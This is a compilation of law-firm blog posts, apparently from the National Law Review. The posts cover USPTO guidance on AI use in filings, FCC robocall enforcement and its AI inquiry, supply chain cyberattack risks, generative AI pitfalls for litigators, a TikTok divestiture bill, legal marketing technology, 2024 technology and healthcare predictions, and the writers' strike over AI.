For All Patent/Trademark Practitioners: USPTO Provides Guidance for Use of AI in Preparing USPTO Submissions

The USPTO expounds a clear message for patent and trademark attorneys, patent agents, and inventors: use of artificial intelligence (AI), including generative AI, in patent and trademark activities and filings before the USPTO entails risks to be mitigated, and you must disclose use of AI in creation of an invention or practice before the USPTO if the use of AI is material to patentability.

The USPTO’s new guidance issued on April 11, 2024 is a counterpart to its guidance issued on February 13, 2024, which addresses AI-assisted invention creation process. In the new guidance issued on April 11, 2024, USPTO officials communicate the risks of using AI in preparing USPTO submissions, including patent applications, affidavits, petitions, office action responses, information disclosure statements, Patent Trial and Appeal Board (PTAB) submissions, and trademark / Trademark Trial and Appeal Board (TTAB) submissions. The common theme between the February 13 and April 11 guidance is the duty to disclose to the USPTO all information known to be material to patentability.

Building on the USPTO’s existing rules and policies, the USPTO’s April 11 guidance discusses the following:

(A) The duty of candor and good faith – each individual associated with a proceeding at the USPTO owes the duty to disclose the USPTO all information known to be material to patentability, including on the use of AI by inventors, parties, and practitioners.

(B) Signature requirement and corresponding certifications – using AI to draft documents without verifying information risks “critical misstatements and omissions”. Any submission for the USPTO in which AI helped prepare must be carefully reviewed by practitioners, who are ultimately responsible, to ensure that they are true and submitted for a proper purpose.

(C) Confidentiality of information – sensitive and confidential client information risks being compromised if shared to third-party AI systems, some of which may be located outside of the United States.

(D) Foreign filing licenses and export regulations – a foreign filing license from the USPTO does not authorize the exporting of subject matter abroad for the preparation of patent applications to be filed in the United States. Practitioners must ensure data is not improperly exported when using AI.

(E) USPTO electronic systems’ policies – Practitioners using AI must be mindful of the terms and conditions for the USPTO’s electronic system, which prohibit the unauthorized access, actions, use, modifications, or disclosure of the data contained in the USPTO system in transit to/from the system.

(F) The USPTO Rules of Professional Conduct – when using the AI tools, practitioners must ensure that they are not violating the duties owed to clients. For example, practitioners must have the requisite legal, scientific, and technical knowledge to reasonably represent the client, without inappropriate reliance on AI. Practitioners also have duty to reasonably consult with the client, including about the use of AI in accomplishing the client’s objectives.

The USPTO’s April 11 guidance overall shares principles with the ethics guidelines that multiple state bars have issued related to generative AI use in practice of law, and addresses them in the patent- and trademark-specific context. Importantly, in addition to ethics considerations, the USPTO guidance reminds us that knowing or willful withholding of information about AI use under (A), overlooking AI’s misstatements leading to false certification under (B), or AI-mediated improper or unauthorized exporting of data or unauthorized access to data under (D) and (E) may lead to criminal or civil liability under federal law or penalties or sanctions by the USPTO.

On the positive side, the USPTO guidance describes the possible favorable aspects of AI “to expand access to our innovation ecosystem and lower costs for parties and practitioners…. The USPTO continues to be actively involved in the development of domestic and international measures to address AI considerations at the intersection of innovation, creativity, and intellectual property.” We expect more USPTO AI guidance to be forthcoming, so please do watch for continued updates in this area.

FCC Puts Another Carrier On Notice with Cease and Desist Letter

If you haven’t already figured it out, the FCC is serious about carriers and providers not carrying robocalls.

The FCC sent a cease and desist letter to DigitalIPvoice informing them of the need to investigate suspected traffic. The FCC reminded them that failure to comply with the letter “may result in downstream voice service providers permanently blocking all of DigitalIPvoice’s traffic”.

For background, DigitalIPvoice is a gateway provider meaning they accept calls directly from foreign originating or intermediate providers. The Industry Traceback Group (ITG) investigated some questionable traffic back in December and identified DigitalIPvoice as the gateway provider for some of the calls. ITG informed DigitalIPvoice and “DigitialIPVoice did not dispute that the calls were illegal.”

This is problematic because as the FCC states “gateway providers that transmit illegal robocall traffic face serious consequences, including blocking by downstream providers of all of the provider’s traffic.”

Emphasis in original. Yes. The FCC sent that in BOLD to DigitalIPvoice. I love aggressive formatting choices.

The FCC then gave DigitalIPvoice steps to take to mitigate the calls in response to this notice. They have to investigate the traffic and then block identified traffic and report back to the FCC and the ITG on the outcome of the investigation.

The whole letter is worth reading but a few points for voice service providers and gateway providers:

  1. You have to know who your customers are and what they are doing on your network. The FCC is requiring voice service providers and gateway providers to include KYC in their robocall mitigation plans.
  2. You have to work with the ITG. You have to have a traceback policy and procedures. All traceback requests have to be treated as a P0 priority.
  3. You have to be able to trace the traffic you are handling. From beginning to end.

The FCC is going after robocalls hard. Protect yourself by understanding what is going to be required of your network.

Keeping you in the loop.

For more news on FCC Regulations, visit the NLR Communications, Media & Internet section.

Supply Chains are the Next Subject of Cyberattacks

The cyberthreat landscape is evolving as threat actors develop new tactics to keep up with increasingly sophisticated corporate IT environments. In particular, threat actors are increasingly exploiting supply chain vulnerabilities to reach downstream targets.

The effects of supply chain cyberattacks are far-reaching, and can affect downstream organizations. The effects can also last long after the attack was first deployed. According to an Identity Theft Resource Center report, “more than 10 million people were impacted by supply chain attacks targeting 1,743 entities that had access to multiple organizations’ data” in 2022. Based upon an IBM analysis, the cost of a data breach averaged $4.45 million in 2023.

What is a supply chain cyberattack?

Supply chain cyberattacks are a type of cyberattack in which a threat actor targets a business offering third-party services to other companies. The threat actor will then leverage its access to the target to reach and cause damage to the business’s customers. Supply chain cyberattacks may be perpetrated in different ways.

  • Software-Enabled Attack: This occurs when a threat actor uses an existing software vulnerability to compromise the systems and data of organizations running the software containing the vulnerability. For example, Apache Log4j is an open source code used by developers in software to add a function for maintaining records of system activity. In November 2021, there were public reports of a Log4j remote execution code vulnerability that allowed threat actors to infiltrate target software running on outdated Log4j code versions. As a result, threat actors gained access to the systems, networks, and data of many organizations in the public and private sectors that used software containing the vulnerable Log4j version. Although security upgrades (i.e., patches) have since been issued to address the Log4j vulnerability, many software and apps are still running with outdated (i.e., unpatched) versions of Log4j.
  • Software Supply Chain Attack: This is the most common type of supply chain cyberattack, and occurs when a threat actor infiltrates and compromises software with malicious code either before the software is provided to consumers or by deploying malicious software updates masquerading as legitimate patches. All users of the compromised software are affected by this type of attack. For example, Blackbaud, Inc., a software company providing cloud hosting services to for-profit and non-profit entities across multiple industries, was ground zero for a software supply chain cyberattack after a threat actor deployed ransomware in its systems that had downstream effects on Blackbaud’s customers, including 45,000 companies. Similarly in May 2023, Progress Software’s MOVEit file-transfer tool was targeted with a ransomware attack, which allowed threat actors to steal data from customers that used the MOVEit app, including government agencies and businesses worldwide.

Legal and Regulatory Risks

Cyberattacks can often expose personal data to unauthorized access and acquisition by a threat actor. When this occurs, companies’ notification obligations under the data breach laws of jurisdictions in which affected individuals reside are triggered. In general, data breach laws require affected companies to submit notice of the incident to affected individuals and, depending on the facts of the incident and the number of such individuals, also to regulators, the media, and consumer reporting agencies. Companies may also have an obligation to notify their customers, vendors, and other business partners based on their contracts with these parties. These reporting requirements increase the likelihood of follow-up inquiries, and in some cases, investigations by regulators. Reporting a data breach also increases a company’s risk of being targeted with private lawsuits, including class actions and lawsuits initiated by business customers, in which plaintiffs may seek different types of relief including injunctive relief, monetary damages, and civil penalties.

The legal and regulatory risks in the aftermath of a cyberattack can persist long after a company has addressed the immediate issues that caused the incident initially. For example, in the aftermath of the cyberattack, Blackbaud was investigated by multiple government authorities and targeted with private lawsuits. While the private suits remain ongoing, Blackbaud settled with state regulators ($49,500,000), the U.S. Federal Trade Commission, and the U.S. Securities Exchange Commission (SEC) ($3,000,000) in 2023 and 2024, almost four years after it first experienced the cyberattack. Other companies that experienced high-profile cyberattacks have also been targeted with securities class action lawsuits by shareholders, and in at least one instance, regulators have named a company’s Chief Information Security Officer in an enforcement action, underscoring the professional risks cyberattacks pose to corporate security leaders.

What Steps Can Companies Take to Mitigate Risk?

First, threat actors will continue to refine their tactics and techniques. Thus, all organizations must adapt and stay current with all regulations and legislation surrounding cybersecurity. Cybersecurity and Infrastructure Security Agency (CISA) urges developer education for creating secure code and verifying third-party components.

Second, stay proactive. Organizations must re-examine not only their own security practices but also those of their vendors and third-party suppliers. If third and fourth parties have access to an organization’s data, it is imperative to ensure that those parties have good data protection practices.

Third, companies should adopt guidelines for suppliers around data and cybersecurity at the outset of a relationship since it may be difficult to get suppliers to adhere to policies after the contract has been signed. For example, some entities have detailed processes requiring suppliers to inform of attacks and conduct impact assessments after the fact. In addition, some entities expect suppliers to follow specific sequences of steps after a cyberattack. At the same time, some entities may also apply the same threat intelligence that it uses for its own defense to its critical suppliers, and may require suppliers to implement proactive security controls, such as incident response plans, ahead of an attack.

Finally, all companies should strive to minimize threats to their software supply by establishing strong security strategies at the ground level.

AI Got It Wrong, Doesn’t Mean We Are Right: Practical Considerations for the Use of Generative AI for Commercial Litigators

Picture this: You’ve just been retained by a new client who has been named as a defendant in a complex commercial litigation. While the client has solid grounds to be dismissed from the case at an early stage via a dispositive motion, the client is also facing cost constraints. This forces you to get creative when crafting a budget for your client’s defense. You remember the shiny new toy that is generative Artificial Intelligence (“AI”). You plan to use AI to help save costs on the initial research, and even potentially assist with brief writing. It seems you’ve found a practical solution to resolve all your client’s problems. Not so fast.

Seemingly overnight, the use of AI platforms has become the hottest thing going, including (potentially) for commercial litigators. However, like most rapidly rising technological trends, the associated pitfalls don’t fully bubble to the surface until after the public has an opportunity (or several) to put the technology to the test. Indeed, the use of AI platforms to streamline legal research and writing has already begun to show its warts. Of course, just last year, prime examples of the danger of relying too heavily on AI were exposed in highly publicized cases venued in the Southern District of New York. See e.g. Benajmin Weiser, Michael D. Cohen’s Lawyer Cited Cases That May Not Exist, Judge Says, NY Times (December 12, 2023); Sara Merken, New York Lawyers Sanctioned For Using Fake Chat GPT Case In Legal Brief, Reuters (June 26, 2023).

In order to ensure litigators are striking the appropriate balance between using technological assistance in producing legal work product, while continuing to adhere to the ethical duties and professional responsibility mandated by the legal profession, below are some immediate considerations any complex commercial litigator should abide by when venturing into the world of AI.

Confidentiality

As any experienced litigator will know, involving a third-party in the process of crafting of a client’s strategy and case theory—whether it be an expert, accountant, or investigator—inevitably raises the issue of protecting the client’s privileged, proprietary and confidential information. The same principle applies to the use of an AI platform. Indeed, when stripped of its bells and whistles, an AI platform could potentially be viewed as another consultant employed to provide work product that will assist in the overall representation of your client. Given this reality, it is imperative that any litigator who plans to use AI, also have a complete grasp of the security of that AI system to ensure the safety of their client’s privileged, proprietary and confidential information. A failure to do so may not only result in your client’s sensitive information being exposed to an unsecure, and potentially harmful, online network, but it can also result in a violation of the duty to make reasonable efforts to prevent the disclosure of or unauthorized access to your client’s sensitive information. Such a duty is routinely set forth in the applicable rules of professional conduct across the country.

Oversight

It goes without saying that a lawyer has a responsibility to ensure that he or she adheres to the duty of candor when making representations to the Court. As mentioned, violations of that duty have arisen based on statements that were included in legal briefs produced using AI platforms. While many lawyers would immediately rebuff the notion that they would fail to double-check the accuracy of a brief’s contents—even if generated using AI—before submitting it to the Court, this concept gets trickier when working on larger litigation teams. As a result, it is not only incumbent on those preparing the briefs to ensure that any information included in a submission that was created with the assistance of an AI platform is accurate, but also that the lawyers responsible for oversight of a litigation team are diligent in understanding when and to what extent AI is being used to aid the work of that lawyer’s subordinates. Similar to confidentiality considerations, many courts’ rules of professional conduct include rules related to senior lawyer responsibilities and oversight of subordinate lawyers. To appropriately abide by those rules, litigation team leaders should make it a point to discuss with their teams the appropriate use of AI at the outset of any matter, as well as to put in place any law firm, court, or client-specific safeguards or guidelines to avoid potential missteps.

Judicial Preferences

Finally, as the old saying goes: a good lawyer knows the law; a great lawyer knows the judge. Any savvy litigator knows that the first thing one should understand prior to litigating a case is whether the Court and the presiding Judge have put in place any standing orders or judicial preferences that may impact litigation strategy. As a result of the rise of use of AI in litigation, many Courts across the country have responded in turn by developing either standing orders, local rules, or related guidelines concerning the appropriate use of AI. See e.g., Standing Order Re: Artificial Intelligence (“AI”) in Cases Assigned to Judge Baylson (June 6, 2023 E.D.P.A.), Preliminary Guidelines on the Use of Artificial Intelligence by New Jersey Lawyers (January 25, 2024, N.J. Supreme Court). Litigators should follow suit and ensure they understand the full scope of how their Court, and more importantly, their assigned Judge, treat the issue of using AI to assist litigation strategy and development of work product.

U.S. House of Representatives Passes Bill to Ban TikTok Unless Divested from ByteDance

Yesterday, with broad bipartisan support, the U.S. House of Representatives voted overwhelmingly (352-65) to support the Protecting Americans from Foreign Adversary Controlled Applications Act, designed to begin the process of banning TikTok’s use in the United States. This is music to my ears. See a previous blog post on this subject.

The Act would penalize app stores and web hosting services that host TikTok while it is owned by Chinese-based ByteDance. However, if the app is divested from ByteDance, the Act will allow use of TikTok in the U.S.

National security experts have warned legislators and the public about downloading and using TikTok as a national security threat. This threat manifests because the owner of ByteDance is required by Chinese law to share users’ data with the Chinese Communist government. When downloading the app, TikTok obtains access to users’ microphones, cameras, and location services, which is essentially spyware on over 170 million Americans’ every move, (dance or not).

Lawmakers are concerned about the detailed sharing of Americans’ data with one of its top adversaries and the ability of TikTok’s algorithms to influence and launch disinformation campaigns against the American people. The Act will make its way through the Senate, and if passed, President Biden has indicated that he will sign it. This is a big win for privacy and national security.

Copyright © 2024 Robinson & Cole LLP. All rights reserved.
by: Linn F. Freedman of Robinson & Cole LLP

For more news on Social Media Legislation, visit the NLR Communications, Media & Internet section.

Three Ways to Get Lawyers to Fall In Love with Marketing Technology

While it may (or may not) be shocking that 50% of marriages end in divorce, what may be a more jarring statistic is how 77% of lawyers have experienced a failed technology implementation. And while some may take a second or even third chance at marriage, you rarely get a second chance at a marketing technology implementation, especially at a law firm.

Today’s legal industry is hyper-competitive, firms are asking attorneys to learn new skills and adopt new technology like artificial intelligence, eMarketing, or experience management systems. So, lawyers should be eager to embrace any MarTech that could help them gain an advantage, right? Unfortunately, fewer than 40% of lawyers use a CRM, and only slightly more than a quarter of them use it for sales pipeline management.

When considering lawyers’ love/hate relationship with their firm’s marketing technology infrastructure, it is important to consider the lawyer’s perspective when it comes to change management and technology adoption. By nature, lawyers are skeptical, hypercritical, risk-averse, and reluctant to change. These attributes are certainly beneficial for practicing law, but not so much for encouraging marketing technology adoption. This is why it can sometimes feel like you are herding cats, except these cats are extremely smart, have opposable thumbs, and argue for sport.

While lawyers and technology might not seem like a match made in heaven, you can follow these steps to ensure greater adoption and utilization of your marketing technology:

1. Needs Assessment

The beauty of technology is that it can do so many things, the problem with technology is… it can do so many things. For technology to succeed it has to adequately satisfy the end users’ needs. Because each firm has its own set of unique needs, technology selection should start with a needs assessment. Interviews should be conducted with key stakeholders to determine your organization’s specific needs and requirements.

As a follow-up to the needs assessment, interview user groups like attorneys, partners and even their assistants, to understand their needs and requirements, and understand their day-to-day processes and problems. These groups each define value differently, meaning that each group will have its own unique needs or set of requirements. Making these users part of the process upfront will increase the likelihood they’ll adopt the technology later on.

2. Communicate

Like any good love affair, a successful technology deployment requires extensive communication. Attorneys must be convinced that the technology will not only benefit the firm, but them individually. It can be helpful to take the time to craft a formal communication plan -starting with an announcement coming from firm leadership outlining the system’s benefits. Realistic expectations should be set, not only for the system but also for user requirements.

Next, establish, document, and distribute any processes and procedures necessary to support the implementation. Most importantly, sharing is caring, so always communicate when goals have been reached or solicit feedback from the end users.

3. Resources

All good relationships require attention. Oftentimes, firms forget to account for the long-term costs associated with a technology deployment. For a successful technology deployment, firms must dedicate necessary resources including time, money, and people. It also takes the coordinated efforts of everyone in the firm, so be sure to invite everyone who may need to be involved, such as:

  • Technical support to assist with implementation and integrations
  • Training programs with outlined criteria for different user groups
  • Data stewards (internal or outsourced) to make sure data is clean, correct and complete
  • The marketing and business development departments that will be tasked with developing and executing a communication strategy
  • Firm leadership and key attorneys whose support can be used to drive adoption

© Copyright 2024 CLIENTSFirst Consulting

by: Christina R. Fritsch JD of CLIENTSFirst Consulting

For more news on Legal Marketing, visit the NLR Law Office Management section.

5 Trends to Watch: 2024 Emerging Technology

  1. Increased Adoption of Generative AI and Push to Minimize Algorithmic Biases – Generative AI took center stage in 2023 and popularity of this technology will continue to grow. The importance behind the art of crafting nuanced and effective prompts will heighten, and there will be greater adoption across a wider variety of industries. There should be advancements in algorithms, increasing accessibility through more user-friendly platforms. These can lead to increased focus on minimizing algorithmic biases and the establishment of guardrails governing AI policies. Of course, a keen awareness of the ethical considerations and policy frameworks will help guide generative AI’s responsible use.
  2. Convergence of AR/VR and AI May Result in “AR/VR on steroids” The fusion of Augmented Reality (AR) and Virtual Reality (VR) technologies with AI unlocks a new era of customization and promises enhanced immersive experiences, blurring the lines between the digital and physical worlds. We expect to see further refining and personalizing of AR/VR to redefine gaming, education, and healthcare, along with various industrial applications.
  3. EV/Battery Companies Charge into Greener Future. With new technologies and chemistries, advancements in battery efficiency, energy density, and sustainability can move the adoption of electric vehicles (EVs) to new heights. Decreasing prices for battery metals canbatter help make EVs more competitive with traditional vehicles. AI may providenew opportunities in optimizing EV performance and help solve challenges in battery development, reliability, and safety.
  4. “Rosie the Robot” is Closer than You Think. With advancements in machine learning algorithms, sensor technologies, and integration of AI, the intelligence and adaptability of robotics should continue to grow. Large language models (LLMs) will likely encourage effective human-robot collaboration, and even non-technical users will find it easy to employ robotics to accomplish a task. Robotics is developing into a field where machines can learn, make decisions, and work in unison with people. It is no longer limited to monotonous activities and repetitive tasks.
  5. Unified Defense in Battle Against Cyber-Attacks. Digital threats are expected to only increase in 2024, including more sophisticated AI-powered attacks. As the international battle against hackers wages on, threat detection, response, and mitigation will play a crucial role in staying ahead of rapidly evolving cyber-attacks. As risks to national security and economic growth, there should be increased collaboration between industries and governments to establish standardized cybersecurity frameworks to protect data and privacy.

10 Market Predictions for 2024 from a Healthcare Lawyer

As a healthcare lawyer, 2023 was a pretty unusual year with the sudden entrance of a number of new players into the healthcare marketplace and a rapid retrenchment of others. With innovation showing no signs of slowing down in the year ahead, healthcare providers should consider how to adapt to improve the patient experience, increase their bottom line, and remain competitive in an evolving industry. Here are 10 personal observations of the past year that may help you plan for the year ahead.

  1. Health tech will continue to boom. Without a doubt, in my practice, health tech exploded, and understandably. In the face of tight margins, healthcare technology may offer the promise of immediate returns (think revenue cycle). But it is also important to understand the context. Health tech offers the promise of quick implementation relative to construction of clinical space, and it can be accomplished without additional clinical staff or regulatory oversight, potentially resulting in a prompt return on investment. Advancing technologies and AI will enable real-time, data driven surgical algorithms and patient-specific instruments to improve outcomes in a variety of specialties.
  2. Value-based care is here to stay. Everyone is interested in value-based care. In the past, value-based care was simply aspirational. Now, there are significant attempts to implement it on a sustained basis. It is not a coincidence that there has also been significant turnover in healthcare leadership in the past few years, and that has likely led to more receptivity.
  3. Expansion of value-based care models. There has been considerable activity around advanced primary care and single-condition chronic disease management. We are now starting to see broader efforts to manage care up and down the continuum of care, involving multi-specialty care and the gamut of care locations. Increased pressure to lower costs will result in increased volumes in lower cost, ambulatory settings.
  4. Regulatory scrutiny will continue to increase. For most, this is a given. In 2023, we saw increased scrutiny up and down the continuum, whether related to pharmaceutical costs, regulation of pharmacy benefit managers, healthcare transaction laws, or innovations in thinking around healthcare from the Federal Trade Commission. With the impending election, it is likely healthcare will receive considerable attention and scrutiny.
  5. Private equity (“PE”) will resume the march – with discipline. In my practice, PE entities rethought their growth strategies to focus on how to bring acquisitions to profitability quickly, from a “growth at all costs” mind set. Now there appears to be an increasing focus on operations and an emphasis on making realistic assumptions to underly growth. This has led to a more realistic pricing discipline and investment in management teams with operational experience.
  6. Partnerships. There is an increasing trend towards partnerships between PE entities and health systems. Health systems are under considerable financial stress, and while they do not universally welcome PE with open arms, some systems do appear open to targeted partnerships. By the same token, PE entities are beginning to realize that they require clinical assets that are most readily available at health systems. This will continue in 2024.
  7. The rise of independent physician groups. There is increasing activity among freestanding physician groups. Some doctors are leery of PE because they believe it is solely focused on profits. Similarly, many physicians are reluctant to be employed by health systems because they believe they will simply become a referral source. While we are not likely to see a return to 2002, where many PE and health system physician deals were unwound, we will see increasing growth by independent physician groups.
  8. Continued consolidation. The trend towards consolidation in healthcare is nowhere near ending. To assume risk (the ultimate goal of value-based care), providers require scale, both vertically and horizontally. While segments of healthcare slowed in 2023, a resumption of growth is inevitable.
  9. Increased insolvencies. Most healthcare providers have very high fixed costs and low margins. Small swings in accounts receivable collections, wages, and managed care payments can have a large impact on entities that are just squeezing by.
  10. New entrants. Last year saw several new entrants to the healthcare marketplace nationally. Who in 2023 would have thought Best Buy would enter the healthcare marketplace? There is still plenty of room for new models of care, which we will see in 2024.

2024 promises to be an interesting year in the healthcare industry.

The FCC Approves an NOI to Dive Deeper into AI and its Effects on Robocalls and Robotexts

AI is on the tip of everyone’s tongue it seems these days. The Dame brought you a recap of President Biden’s orders addressing AI at the beginning of the month. This morning at the FCC’s open meeting they were presented with a request for a Notice of Inquiry (NOI) to gather additional information about the benefits and harms of artificial intelligence and its use alongside “robocall and robotext”. The following five areas of interest are as follows:

  • First, the NOI seeks, on whether and if so how the commission should define AI technologies for purposes of the inquiry this includes particular uses of AI technologies that are relevant to the commission’s statutory response abilities under the TCPA, which protects consumers from nonemergency calls and texts using an autodialer or containing an artificial or prerecorded voice.
  • Second, the NOI seeks comment on how technologies may impact consumers who receive robocalls and robotexts including any potential benefits and risks that the emerging technologies may create. Specifically, the NOI seeks information on how these technologies may alter the functioning of the existing regulatory framework so that the commission may formulate policies that benefit consumers by ensuring they continue to receive privacy protections under the TCPA.
  • Third, the NOI seeks comment on whether it is necessary or possible to determine at this point whether future types of AI technologies may fall within the TCPA’s existing prohibitions on autodial calls or texts and artificial or prerecorded voice messages.
  • Fourth, NOI seeks comment on whether the commission should consider ways to verify the authenticity and legitimately generate AI voice or text content from trusted sources such as through the use of watermarks, certificates, labels, signatures, or other forms of labels when callers rely on AI technology to generate content. This may include, for example, emulating a human voice on a robocall or creating content in a text message.
  • Lastly, seeks comment on what next steps the commission should consider to further the inquiry.

While all the commissioners voted to approve the NOI they did share a few insightful comments. Commissioner Carr stated “ If AI can combat illegal robocalls, I’m all for it” but he also expressed that he does “…worry that the path we are heading down is going to be overly prescriptive” and suggests “…Let’s put some common-sense guardrails in place, but let’s not be so prescriptive and so heavy-handed on the front end that we end up benefiting large incumbents in the space because they can deal with the regulatory frameworks and stifling the smaller innovation to come.”

Commissioner Starks shared “I, for one, believe this intersectionality is clinical because the future of AI remains uncertain, one thing is clear — it has the potential to impact if not transform every aspect of American life, and because of that potential, each part of our government bears responsibility to better understand the risks, opportunities within its mandate, while being mindful of the limits of its expertise, experience, and authority. In this era of rapid technological change, we must collaborate, lean into our expertise across agencies to best serve our citizens and consumers.” Commissioner Starks seemed to be particularly focused on AI’s ability to facilitate bad actors in schemes like voice cloning and how the FCC can implement safeguards against this type of behavior.

“AI technologies can bring new challenges and opportunities. responsible and ethical implementation of AI technologies is crucial to strike a balance, ensuring that the benefits of AI are harnessed to protect consumers from harm rather than amplifying the risks in increasing the digital landscape” Commissioner Gomez shared.

Finally, the topic around the AI NOI wrapped up with Chairwoman Rosenworcel commenting “… I think we make a mistake if we only focus on the potential for harm. We needed to equally focus on how artificial intelligence can radically improve the tools we have today to block unwanted robocalls and robotexts. We are talking about technology that can see patterns in our network traffic, unlike anything we have today. They can lead to the development of analytic tools that are exponentially better at finding fraud before it reaches us at home. Used at scale, we cannot only stop this junk, we can use it to increase trust in our networks. We are asking how artificial intelligence is being used right now to recognize patterns in network traffic and how it can be used in the future. We know the risks this technology involves but we also want to harness the benefits.”

Automating Entertainment: Writers Demand that Studios Not Use AI

When the Writers Guild of America (WGA) came with their list of demands in the strike that has already grinded production on many shows to a halt, chief among them was that the studios agree not to use artificial intelligence to write scripts. Specifically, the Guild had two asks: First, they said that “literary material,” including screenplays and outlines, must be generated by a person and not an AI; Second, they insisted that “source material” not be AI-generated.

The Alliance of Motion Picture and Television Producers (AMPTP), which represents the studios, rejected this proposal. They countered that they would be open to holding annual meetings to discuss advancements in technology. Alarm bells sounded as the WGA saw an existential threat to their survival and that Hollywood was already planning for it.

Writers are often paid at a far lower rate to adapt “source material” such as a comic book or a novel into a screenplay than they are paid to generate original literary material. By using AI tools to generate an outline or first draft of an original story and then enlisting a human to “adapt” it into screenplay, production studios potentially stand to save significantly.

Many industries have embraced the workflow of an AI-generated “first draft” that the human then punches up. And the WGA has said that its writers’ using AI as a tool is acceptable: There would essentially be a robot in the writers’ room with writers supplementing their craft with AI-generated copy, but without AI wholly usurping their jobs.

Everyone appears in agreement that AI could never write the next season of White Lotus or Succession, but lower brow shows could easily be AI aped. Law and Order, for instance, is an often cited example. Not just because it’s formulaic but because AIs are trained on massive data sets of copyrighted content and there are 20 seasons of Law and Order for the AI to ingest. And as AI technology gets more advanced who knows what it could do? Chat GPT was initially released last November and as of writing we’re on GPT-4, a far more powerful version of a platform that is advancing exponentially.

The studios’ push for the expanded use of AI is not without its own risks. The Copyright Office has equivocated somewhat in its determination that AI-generated art is not protectable. In a recent Statement of Policy, the Office said that copyright will only protect aspects of the work that were judged to have been made by the authoring human, resulting in partial protections of AI-generated works. So, the better the AI gets—the more it contributes to cutting out the human writer—the weaker the copyright protection for the studios/networks.

Whether or not AI works infringe the copyrights on the original works is an issue that is currently being litigated in a pair of lawsuits against Stability AI, the startup that created Stable Diffusion (an AI tool with the impressive ability to turn text into images in what some have dubbed the most massive art heist in history). Some have questioned whether the humans who wrote the original episodes would get compensated, and the answer is maybe not. In most cases the scripts were likely works for hire, owned by the studios.

If the studios own the underlying scripts, what happens to the original content if the studios take copyrighted content and put it through a machine that turns out uncopyrightable content? Can you DMCA or sue someone who copies that? As of this writing, there are no clear answers to these questions.

There are legal questions and deeper philosophical questions about making art. As the AI improves and humans become more cyborgian, does the art become indistinguishable? Prolific users of Twitter say they think their thoughts in 280 characters. Perhaps our readers can relate to thinking of their time in 6 minute increments, or .1’s of an hour. Further, perhaps our readers can relate to their industry being threatened by automation. According to a recent report from Goldman Sachs, generative artificial intelligence is putting 44% of legal jobs at risk.

© Copyright 2023 Squire Patton Boggs (US) LLP

For more Employment Legal News, click here to visit the National Law Review.